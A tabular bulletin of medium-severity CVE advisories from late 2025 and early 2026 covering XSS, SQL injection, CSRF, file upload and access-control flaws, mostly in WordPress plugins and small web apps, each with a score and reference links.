| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.14 and 4.0.15 have a stored cross-site scripting (XSS) vulnerability that allows an attacker to execute arbitrary JavaScript in an administrator's browser by registering a user whose display name contains HTML entities. When an administrator views the admin user list, the payload is decoded server-side and rendered without escaping, resulting in script execution in the admin context. Version 4.0.16 contains a patch for the issue. | 2025-12-29 | 5.4 | CVE-2025-68951 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-jv8r-hv7q-p6vc https://github.com/thorsten/phpMyFAQ/commit/61829e83411f7b28bc6fd1052bfde54c32c6c370 https://github.com/thorsten/phpMyFAQ/commit/8211d1d25951b4c272443cfc3ef9c09b1363fd87 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, in the WriteSVGImage function, using an int variable to store number_attributes caused an integer overflow. This, in turn, triggered a buffer overflow and caused a DoS attack. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 5.3 | CVE-2025-69204 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e |
| Gitea--Gitea | In Gitea before 1.25.2, /api/v1/user has different responses for failed authentication depending on whether a username exists. | 2026-01-01 | 5.3 | CVE-2025-69413 | https://blog.gitea.com/release-of-1.25.2/ https://github.com/go-gitea/gitea/releases/tag/v1.25.2 https://github.com/go-gitea/gitea/issues/35984 https://github.com/go-gitea/gitea/pull/36002 |
| Plex--plex.tv backend | In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve other tokens (intended for unrelated access) via clients.plex.tv/devices.xml. | 2026-01-02 | 5 | CVE-2025-69416 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| Plex--plex.tv backend | In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve share tokens (intended for unrelated access) via a shared_servers endpoint. | 2026-01-02 | 5 | CVE-2025-69417 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| stefanberger--libtpms | libtpms, a library that provides software emulation of a Trusted Platform Module, has a flaw in versions 0.10.0 and 0.10.1. The commonly used integration of libtpms with OpenSSL 3.x contained a vulnerability related to the returned IV (initialization vector) when certain symmetric ciphers were used. Instead of returning the last IV it returned the initial IV to the caller, thus weakening the subsequent encryption and decryption steps. The highest threat from this vulnerability is to data confidentiality. Version 0.10.2 fixes the issue. No known workarounds are available. | 2026-01-02 | 5.5 | CVE-2026-21444 | https://github.com/stefanberger/libtpms/security/advisories/GHSA-7jxr-4j3g-p34f https://github.com/stefanberger/libtpms/issues/541 https://github.com/stefanberger/libtpms/commit/33c9ff074cb16c1841ce7d7f33643c17c426743a |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue. | 2026-01-03 | 5.3 | CVE-2026-21484 | https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch https://github.com/Mintplex-Labs/anything-llm/commit/e287fab56089cf8fcea9ba579a3ecdeca0daa313 |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content. | 2025-12-30 | 4.3 | CVE-2022-50801 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Authenticated Stored Cross-Site Scripting (XSS) Vulnerability |
| PKrystian--Full-Stack-Bank | A vulnerability was detected in PKrystian Full-Stack-Bank up to bf73a0179e3ff07c0d7dc35297cea0be0e5b1317. This vulnerability affects unknown code of the component User Handler. Performing manipulation results in sql injection. It is possible to initiate the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The patch is named 25c9965a872c704f3a9475488dc5d3196902199a. It is suggested to install a patch to address this issue. | 2025-12-31 | 4.7 | CVE-2023-7331 | VDB-338650 | PKrystian Full-Stack-Bank User sql injection VDB-338650 | CTI Indicators (IOB, IOC, TTP) https://github.com/PKrystian/Full-Stack-Bank/pull/21 https://github.com/PKrystian/Full-Stack-Bank/commit/25c9965a872c704f3a9475488dc5d3196902199a |
| wpchill--Strong Testimonials | The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'edit_rating' function in all versions up to, and including, 3.2.18. This makes it possible for authenticated attackers with Contributor-level access and above to modify or delete the rating meta on any testimonial post, including those created by other users, by reusing a valid nonce obtained from their own testimonial edit screen. | 2025-12-30 | 4.3 | CVE-2025-14426 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c83f48dd-9070-412d-b911-98581a81e29a?source=cve https://plugins.trac.wordpress.org/browser/strong-testimonials/tags/3.2.18/admin/class-strong-testimonials-post-editor.php#L379 https://plugins.trac.wordpress.org/browser/strong-testimonials/tags/3.2.18/admin/class-strong-testimonials-post-editor.php#L29 https://plugins.trac.wordpress.org/changeset/3416480/ |
| galdub--All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs My Sticky Elements | The All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs - My Sticky Elements plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the 'my_sticky_elements_bulks' function in all versions up to, and including, 2.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all contact form leads stored by the plugin. | 2026-01-01 | 4.3 | CVE-2025-14428 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b82ce74-11ac-4719-961d-a16717ce023b?source=cve https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L29 https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L1788 https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-front.php#L121 https://plugins.trac.wordpress.org/changeset/3423407/ |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy | The Easy Digital Downloads plugin for WordPress is vulnerable to Unvalidated Redirect in all versions up to, and including, 3.6.2. This is due to insufficient validation on the redirect url supplied via the 'edd_redirect' parameter. This makes it possible for unauthenticated attackers to redirect users with the password reset email to potentially malicious sites if they can successfully trick them into performing an action. | 2025-12-31 | 4.3 | CVE-2025-14783 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c0fb43c-f576-412e-a144-4725356ed9a0?source=cve https://plugins.trac.wordpress.org/browser/easy-digital-downloads/trunk/includes/users/lost-password.php#L187 https://plugins.trac.wordpress.org/browser/easy-digital-downloads/trunk/includes/blocks/views/forms/lost-password.php#L24 https://plugins.trac.wordpress.org/changeset/3426524/easy-digital-downloads/trunk/includes/users/lost-password.php |
| JFrog--Artifactory (Workers) | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS).This issue affects Artifactory (Workers): from >=7.94.0 through <7.117.10. | 2026-01-04 | 4.9 | CVE-2025-14830 | https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories |
| BiggiDroid--Simple PHP CMS | A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected by this issue is some unknown functionality of the file /admin/editsite.php. Executing manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-29 | 4.7 | CVE-2025-15169 | VDB-338549 | BiggiDroid Simple PHP CMS editsite.php sql injection VDB-338549 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708845 | BiggiDroid Simple PHP CMS BiggiDroid 1.0 SQL Injection https://gitee.com/sun-huizhi/dazhi/issues/IDBDAY |
| Advaya Softech--GEMS ERP Portal | A security vulnerability has been detected in Advaya Softech GEMS ERP Portal up to 2.1. This affects an unknown part of the file /home.jsp?isError=true of the component Error Message Handler. The manipulation of the argument Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-29 | 4.3 | CVE-2025-15170 | VDB-338550 | Advaya Softech GEMS ERP Portal Error Message home.jsp cross site scripting VDB-338550 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717590 | Advaya Softech GEMS ERP Portal 2.1 Cross Site Scripting https://syansec.in/video_poc/cve_2025.mp4 |
| code-projects--Content Management System | A security flaw has been discovered in code-projects/anirbandutta9 Content Management System and News-Buzz 1.0. This vulnerability affects unknown code of the file /admin/editposts.php. Performing manipulation of the argument image results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 4.7 | CVE-2025-15197 | VDB-338584 | code-projects/anirbandutta9 Content Management System/News-Buzz editposts.php unrestricted upload VDB-338584 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724721 | Code-projects Content Management System v1.0 Arbitrary file upload vulnerability https://github.com/Limingqian123/CVE/issues/7 |
| code-projects--Student File Management System | A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 4.3 | CVE-2025-15213 | VDB-338598 | code-projects Student File Management System File Download download.php improper authorization VDB-338598 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725080 | Code-Projects 学生文件管理系统 V1.0 越权 https://github.com/Bai-public/CVE/issues/5 https://code-projects.org/ |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. This affects the function init of the file src/main/java/com/sohu/cache/web/controller/LoginController.java. The manipulation results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 4.3 | CVE-2025-15220 | VDB-338605 | SohuTV CacheCloud LoginController.java init cross site scripting VDB-338605 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716320 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/379 |
| Philipinho--Simple-PHP-Blog | A vulnerability was found in Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958. Impacted is an unknown function of the file /login.php. Performing manipulation of the argument Username results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The vendor was contacted early about this disclosure and makes clear that the product is "[f]or educational purposes only". | 2025-12-31 | 4.3 | CVE-2025-15223 | VDB-338608 | Philipinho Simple-PHP-Blog login.php cross site scripting VDB-338608 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710150 | Philipinho Simple-PHP-Blog 1.0 Improper Neutralization of Alternate XSS Syntax https://gitee.com/sun-huizhi/dazhi/issues/IDBUOY |
| 08CMS--Novel System | A security vulnerability has been detected in 08CMS Novel System up to 3.4. This issue affects some unknown processing of the file admina/mtpls.inc.php of the component Template Handler. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-30 | 4.7 | CVE-2025-15250 | VDB-338640 | 08CMS Novel System Template mtpls.inc.php code injection VDB-338640 | CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/keneny/cve/issues/ID3DEM |
| BiggiDroid--Simple PHP CMS | A security flaw has been discovered in BiggiDroid Simple PHP CMS 1.0. This impacts an unknown function of the file /admin/edit.php of the component Site Logo Handler. Performing manipulation of the argument image results in unrestricted upload. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-12-30 | 4.7 | CVE-2025-15262 | VDB-338656 | BiggiDroid Simple PHP CMS Site Logo edit.php unrestricted upload VDB-338656 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725815 | BiggiDroid Simple PHP CMS 1.0 SQL Injection https://gitee.com/shanyaohei/black-yam/issues/IDGML9 |
| n/a--newbee-mall-plus | A vulnerability was determined in newbee-mall-plus 2.0.0. This impacts the function Upload of the file src/main/java/ltd/newbee/mall/controller/common/UploadController.java of the component Product Information Edit Page. This manipulation of the argument File causes unrestricted upload. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 4.7 | CVE-2025-15360 | VDB-338744 | newbee-mall-plus Product Information Edit UploadController.java upload unrestricted upload VDB-338744 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716785 | https://github.com/newbee-ltd/newbee-mall-plus newbee-mall-plus 2.0.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| n/a--iCMS | A vulnerability was detected in iCMS up to 8.0.0. Affected is the function Save of the file app/config/ConfigAdmincp.php of the component POST Parameter Handler. The manipulation of the argument config results in code injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 4.7 | CVE-2025-15394 | VDB-339163 | iCMS POST Parameter ConfigAdmincp.php save code injection VDB-339163 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719029 | ICMS https://www.icmsdev.com/ 8.0.0 Code Injection https://note-hxlab.wetolink.com/share/QWuWZeAmzUdm |
| n/a--PHPEMS | A vulnerability was detected in PHPEMS up to 11.0. The impacted element is an unknown function. The manipulation results in cross-site request forgery. The attack may be launched remotely. | 2026-01-01 | 4.3 | CVE-2025-15405 | VDB-339325 | PHPEMS cross-site request forgery VDB-339325 | CTI Indicators (IOB, IOC) Submit #728314 | PHPEMS <=11.0 Cross-Site Request Forgery https://byebydoggy.github.io/post/2025/1231-phpems-csrf-poc/ |
| go-sonic--sonic | A flaw has been found in go-sonic sonic up to 1.1.4. The affected element is the function FetchTheme of the file service/theme/git_fetcher.go of the component Theme Fetching API. Executing manipulation of the argument uri can lead to server-side request forgery. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 4.7 | CVE-2025-15414 | VDB-339335 | go-sonic Theme Fetching API git_fetcher.go FetchTheme server-side request forgery VDB-339335 | CTI Indicators (IOB, IOC, IOA) Submit #719789 | sonic https://github.com/go-sonic/sonic 1.1.4 Server-Side Request Forgery https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ#-span--strong-proof-of-concept---strong---span- |
| xnx3--wangmarket | A vulnerability has been found in xnx3 wangmarket up to 6.4. The impacted element is the function uploadImage of the file /sits/uploadImage.do of the component XML File Handler. The manipulation of the argument image leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 4.7 | CVE-2025-15415 | VDB-339336 | xnx3 wangmarket XML File uploadImage.do uploadImage unrestricted upload VDB-339336 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721078 | xnx3 https://github.com/xnx3/wangmarket <=v6.4 Cross Site Scripting https://github.com/yuccun/CVE/blob/main/wangmarket-Upload2StoredXSS.md |
| n/a--PluXml | A vulnerability was determined in PluXml up to 5.8.22. Affected is the function FileCookieJar::__destruct of the file core/admin/medias.php of the component Media Management Module. Executing manipulation of the argument File can lead to deserialization. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was informed early about this issue and announced that "[w]e fix this issue in the next version 5.8.23". A patch for it is ready. | 2026-01-02 | 4.7 | CVE-2025-15438 | VDB-339383 | PluXml Media Management medias.php __destruct deserialization VDB-339383 | CTI Indicators (IOB, IOC, IOA) Submit #713989 | PluXml 5.8.22 Deserialization Vulnerability https://note-hxlab.wetolink.com/share/9SJUnaDcJuqz |
| n/a--CRMEB | A vulnerability was determined in CRMEB up to 5.6.1. This vulnerability affects unknown code of the file /adminapi/export/product_list. This manipulation of the argument cate_id causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 4.7 | CVE-2025-15442 | VDB-339464 | CRMEB product_list sql injection VDB-339464 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721915 | crmeb v5.6.1 SQL Injection https://github.com/En0t5/vul/blob/main/crmeb/crmeb-export-product_list-SQL.md https://github.com/En0t5/vul/blob/main/crmeb/crmeb-export-product_list-SQL.md#poc |
| n/a--CRMEB | A vulnerability was identified in CRMEB up to 5.6.1. This issue affects some unknown processing of the file /adminapi/product/product_export. Such manipulation of the argument cate_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 4.7 | CVE-2025-15443 | VDB-339465 | CRMEB product_export sql injection VDB-339465 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721916 | crmeb v5.6.1 SQL Injection https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md#poc |
| Digages--Direct Payments WP | Missing Authorization vulnerability in Digages Direct Payments WP allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Direct Payments WP: from n/a through 1.3.0. | 2025-12-31 | 4.3 | CVE-2025-49339 | https://vdp.patchstack.com/database/wordpress/plugin/direct-payments-wp/vulnerability/wordpress-direct-payments-wp-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve |
| Digages--Direct Payments WP | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Digages Direct Payments WP allows Retrieve Embedded Sensitive Data.This issue affects Direct Payments WP: from n/a through 1.3.0. | 2025-12-31 | 4.3 | CVE-2025-49340 | https://vdp.patchstack.com/database/wordpress/plugin/direct-payments-wp/vulnerability/wordpress-direct-payments-wp-plugin-1-3-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| YoOhw Studio--Order Cancellation & Returns for WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in YoOhw Studio Order Cancellation & Returns for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Cancellation & Returns for WooCommerce: from n/a through 1.1.10. | 2025-12-31 | 4.3 | CVE-2025-49352 | https://vdp.patchstack.com/database/wordpress/plugin/wc-order-cancellation-return/vulnerability/wordpress-order-cancellation-returns-for-woocommerce-plugin-1-1-10-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mykola Lukin--Orders Chat for WooCommerce | Missing Authorization vulnerability in Mykola Lukin Orders Chat for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Orders Chat for WooCommerce: from n/a through 1.2.0. | 2025-12-31 | 4.3 | CVE-2025-49356 | https://vdp.patchstack.com/database/wordpress/plugin/orders-chat-for-woocommerce/vulnerability/wordpress-orders-chat-for-woocommerce-plugin-1-2-0-broken-access-control-vulnerability?_s_id=cve |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55062 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55063 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55064 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Appointify--Appointify | Cross-Site Request Forgery (CSRF) vulnerability in Appointify allows Cross Site Request Forgery.This issue affects Appointify: from n/a through 1.0.8. | 2025-12-31 | 4.3 | CVE-2025-59130 | https://vdp.patchstack.com/database/wordpress/plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--Genemy | Server-Side Request Forgery (SSRF) vulnerability in Jthemes Genemy allows Server Side Request Forgery.This issue affects Genemy: from n/a through 1.6.6. | 2025-12-31 | 4.9 | CVE-2025-59138 | https://vdp.patchstack.com/database/wordpress/theme/genemy/vulnerability/wordpress-genemy-theme-1-6-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Fahad Mahmood--Easy Upload Files During Checkout | Missing Authorization vulnerability in Fahad Mahmood Easy Upload Files During Checkout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Upload Files During Checkout: from n/a through 3.0.0. | 2025-12-31 | 4.3 | CVE-2025-62078 | https://vdp.patchstack.com/database/wordpress/plugin/easy-upload-files-during-checkout/vulnerability/wordpress-easy-upload-files-during-checkout-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| Channelize.io Team--Live Shopping & Shoppable Videos For WooCommerce | Cross-Site Request Forgery (CSRF) vulnerability in Channelize.Io Team Live Shopping & Shoppable Videos For WooCommerce allows Cross Site Request Forgery.This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through 2.2.0. | 2025-12-31 | 4.3 | CVE-2025-62080 | https://vdp.patchstack.com/database/wordpress/plugin/live-shopping-video-streams/vulnerability/wordpress-live-shopping-shoppable-videos-for-woocommerce-plugin-2-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WP Messiah--BoomDevs WordPress Coming Soon Plugin | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah BoomDevs WordPress Coming Soon Plugin allows Retrieve Embedded Sensitive Data.This issue affects BoomDevs WordPress Coming Soon Plugin: from n/a through 1.0.4. | 2025-12-31 | 4.3 | CVE-2025-62083 | https://vdp.patchstack.com/database/wordpress/plugin/coming-soon-by-boomdevs/vulnerability/wordpress-boomdevs-wordpress-coming-soon-plugin-plugin-1-0-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| Imdad Next Web--iNext Woo Pincode Checker | Cross-Site Request Forgery (CSRF) vulnerability in Imdad Next Web iNext Woo Pincode Checker allows Cross Site Request Forgery.This issue affects iNext Woo Pincode Checker: from n/a through 2.3.1. | 2025-12-31 | 4.3 | CVE-2025-62084 | https://vdp.patchstack.com/database/wordpress/plugin/inext-woo-pincode-checker/vulnerability/wordpress-inext-woo-pincode-checker-plugin-2-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Web Builder 143--Sticky Notes for WP Dashboard | Missing Authorization vulnerability in Web Builder 143 Sticky Notes for WP Dashboard allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sticky Notes for WP Dashboard: from n/a through 1.2.4. | 2025-12-31 | 4.3 | CVE-2025-62087 | https://vdp.patchstack.com/database/wordpress/plugin/wb-sticky-notes/vulnerability/wordpress-sticky-notes-for-wp-dashboard-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| MERGADO--Mergado Pack | Cross-Site Request Forgery (CSRF) vulnerability in MERGADO Mergado Pack allows Cross Site Request Forgery.This issue affects Mergado Pack: from n/a through 4.2.0. | 2025-12-31 | 4.3 | CVE-2025-62089 | https://vdp.patchstack.com/database/wordpress/plugin/mergado-marketing-pack/vulnerability/wordpress-mergado-pack-plugin-4-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Approveme--Signature Add-On for Gravity Forms | Missing Authorization vulnerability in Approveme Signature Add-On for Gravity Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Signature Add-On for Gravity Forms: from n/a through 1.8.6. | 2025-12-31 | 4.3 | CVE-2025-62099 | https://vdp.patchstack.com/database/wordpress/plugin/gravity-signature-forms-add-on/vulnerability/wordpress-signature-add-on-for-gravity-forms-plugin-1-8-6-broken-access-control-vulnerability?_s_id=cve |
| Omid Shamloo--Pardakht Delkhah | Cross-Site Request Forgery (CSRF) vulnerability in Omid Shamloo Pardakht Delkhah allows Cross Site Request Forgery.This issue affects Pardakht Delkhah: from n/a through 3.0.0. | 2025-12-31 | 4.3 | CVE-2025-62101 | https://vdp.patchstack.com/database/wordpress/plugin/pardakht-delkhah/vulnerability/wordpress-pardakht-delkhah-plugin-3-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Merv Barrett--Import into Easy Property Listings | Cross-Site Request Forgery (CSRF) vulnerability in Merv Barrett Import into Easy Property Listings allows Cross Site Request Forgery.This issue affects Import into Easy Property Listings: from n/a through 2.2.1. | 2025-12-30 | 4.3 | CVE-2025-62112 | https://vdp.patchstack.com/database/wordpress/plugin/easy-property-listings-xml-csv-import/vulnerability/wordpress-import-into-easy-property-listings-plugin-2-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| emendo_seb--Co-marquage service-public.fr | Cross-Site Request Forgery (CSRF) vulnerability in emendo_seb Co-marquage service-public.Fr allows Cross Site Request Forgery.This issue affects Co-marquage service-public.Fr: from n/a through 0.5.77. | 2025-12-31 | 4.3 | CVE-2025-62113 | https://vdp.patchstack.com/database/wordpress/plugin/co-marquage-service-public/vulnerability/wordpress-co-marquage-service-public-fr-plugin-0-5-77-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThemeBoy--Hide Plugins | Missing Authorization vulnerability in ThemeBoy Hide Plugins allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hide Plugins: from n/a through 1.0.4. | 2025-12-31 | 4.3 | CVE-2025-62115 | https://vdp.patchstack.com/database/wordpress/plugin/hide-plugins/vulnerability/wordpress-hide-plugins-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve |
| Ink themes--WP Gmail SMTP | Cross-Site Request Forgery (CSRF) vulnerability in Ink themes WP Gmail SMTP allows Cross Site Request Forgery.This issue affects WP Gmail SMTP: from n/a through 1.0.7. | 2025-12-31 | 4.3 | CVE-2025-62123 | https://vdp.patchstack.com/database/wordpress/plugin/wp-gmail-smtp/vulnerability/wordpress-wp-gmail-smtp-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SiteLock--SiteLock Security | Missing Authorization vulnerability in SiteLock SiteLock Security allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security: from n/a through 5.0.1. | 2025-12-30 | 4.3 | CVE-2025-62128 | https://vdp.patchstack.com/database/wordpress/plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve |
| WPdiscover--Accordion Slider Gallery | Missing Authorization vulnerability in WPdiscover Accordion Slider Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accordion Slider Gallery: from n/a through 2.7. | 2025-12-31 | 4.3 | CVE-2025-62130 | https://vdp.patchstack.com/database/wordpress/plugin/accordion-slider-gallery/vulnerability/wordpress-accordion-slider-gallery-plugin-2-7-broken-access-control-vulnerability?_s_id=cve |
| Strategy11 Team--Tasty Recipes Lite | Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through 1.1.5. | 2025-12-31 | 4.3 | CVE-2025-62131 | https://vdp.patchstack.com/database/wordpress/plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability-2?_s_id=cve |
| Strategy11 Team--Tasty Recipes Lite | Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through 1.1.5. | 2025-12-31 | 4.3 | CVE-2025-62132 | https://vdp.patchstack.com/database/wordpress/plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Manidoraisamy--FormFacade | Cross-Site Request Forgery (CSRF) vulnerability in Manidoraisamy FormFacade allows Cross Site Request Forgery.This issue affects FormFacade: from n/a through 1.4.1. | 2025-12-31 | 4.3 | CVE-2025-62133 | https://vdp.patchstack.com/database/wordpress/plugin/formfacade/vulnerability/wordpress-formfacade-plugin-1-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| nicashmu--Post Video Players | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in nicashmu Post Video Players allows Retrieve Embedded Sensitive Data.This issue affects Post Video Players: from n/a through 1.163. | 2025-12-31 | 4.3 | CVE-2025-62143 | https://vdp.patchstack.com/database/wordpress/plugin/video-playlist-and-gallery-plugin/vulnerability/wordpress-post-video-players-plugin-1-163-sensitive-data-exposure-vulnerability?_s_id=cve |
| Eugen Bobrowski--Robots.txt rewrite | Cross-Site Request Forgery (CSRF) vulnerability in Eugen Bobrowski Robots.Txt rewrite allows Cross Site Request Forgery.This issue affects Robots.Txt rewrite: from n/a through 1.6.1. | 2025-12-31 | 4.3 | CVE-2025-62148 | https://vdp.patchstack.com/database/wordpress/plugin/robotstxt-rewrite/vulnerability/wordpress-robots-txt-rewrite-plugin-1-6-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
